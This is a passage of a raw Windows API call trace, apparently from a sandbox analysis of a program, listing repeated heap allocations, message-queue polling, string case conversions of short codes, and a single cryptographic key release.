0x34aa4c0 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0248.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0248.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0248.329] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0248.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0248.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0248.330] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0248.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0248.331] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0248.331] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0248.332] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0248.332] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.332] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0248.332] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0248.332] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0248.332] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0248.332] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.332] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0248.333] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.333] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0248.333] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.333] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0248.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.333] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.333] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.334] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.334] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.334] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.334] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.334] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.334] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.334] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0248.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0248.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.335] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0248.336] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0248.336] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0248.336] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0248.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0248.336] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0248.337] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.337] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0248.337] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.337] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.337] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.337] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0248.337] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.338] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.338] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0248.338] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0248.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0248.338] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0248.339] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0248.339] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.339] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0248.339] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.339] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0248.339] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0248.339] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0248.340] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0248.340] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0248.340] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0248.340] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0248.340] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0248.340] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.340] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0248.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0248.341] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.341] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0248.341] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0248.341] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.341] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0248.341] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0248.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0248.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0248.342] 